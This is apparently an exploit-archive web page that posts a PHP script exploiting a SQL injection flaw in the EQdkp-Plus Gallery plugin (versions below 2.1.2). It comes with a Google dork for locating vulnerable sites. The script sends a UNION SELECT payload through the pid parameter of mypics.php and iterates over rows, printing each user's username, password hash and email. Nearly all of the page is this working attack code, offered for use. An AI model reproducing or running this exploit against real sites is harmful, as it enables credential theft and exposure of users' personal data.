Home / os / win7

EQdkp-Plus Gallery < v2.1.2 Blind SQL Injection Vulnerabi

Posted on 10 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>EQdkp-Plus Gallery &lt; v2.1.2 Blind SQL Injection Vulnerabilty</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================
EQdkp-Plus Gallery &lt; v2.1.2 Blind SQL Injection Vulnerabilty
============================================================


#!/bin/php
&lt;?php
/*
######################################################################
#        _           _       _                 _                     #
#       | |         | |     | |               | |                    #
#       | |__  _   _| |_ ___| |__  _   _ _ __ | | _____ _ __         #
#       | '_ | | | | __/ _  '_ | | | | '_ | |/ / _  '__|        #
#       | |_) | |_| | ||  __/ |_) | |_| | | | |   &lt;  __/ |           #
#       |_.__/ \__, |\__\___|_.__/ \__,_|_| |_|_|\_\___|_|           #
#               __/ |                      by jiuX                   #
#              |___/                                                 #
######################################################################
# Name : EQdkp-Plus Gallery &lt; v2.1.2 
# Date : 10.07.2010
# Platform: Linux/Windows
# Google Dork: &gt; &quot;EQDKP Plus&quot; inurl:mypics.php &lt;
# greetz to : x2k, medison, x33, bl4ckn3ss, Luk ...
######################################################################
*/
$x = $argv[1].&quot;/portal/plugins/gallery/mypics.php?pid=-1337+and+1=0+union+select+1,2,concat%280x62797465,username,0x3A,user_password,0x3A,user_email,0x62756e6b6572%29,4,5,6,7,8+from+eqdkp_users&quot;;
function b($b,$c) {
$b = file_get_contents($b.&quot;+limit+&quot;.$c.&quot;,1--%20-&quot;);
preg_match_all(&quot;/byte(.*)bunker/&quot;,$b,$w, PREG_PATTERN_ORDER);
$w = explode(&quot;:&quot;,$w[1][0]);
if (!$w[0]==&quot;&quot;) {
echo &quot;ID: &quot;.$c.&quot;
Username: &quot;.$w[0].&quot;
&quot;;echo &quot;Password: &quot;.$w[1].&quot;
&quot;;echo &quot;E-Mail: &quot;.$w[2].&quot;
-----------------------
&quot;;return true;
}else{return false;}}
echo &quot;-----------------------
Checking: &quot;.$argv[1].&quot;
-----------------------
&quot;;
$i=0;$bb=true;while($bb == true){ $bb = b($x,$i);	$i++;  }


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :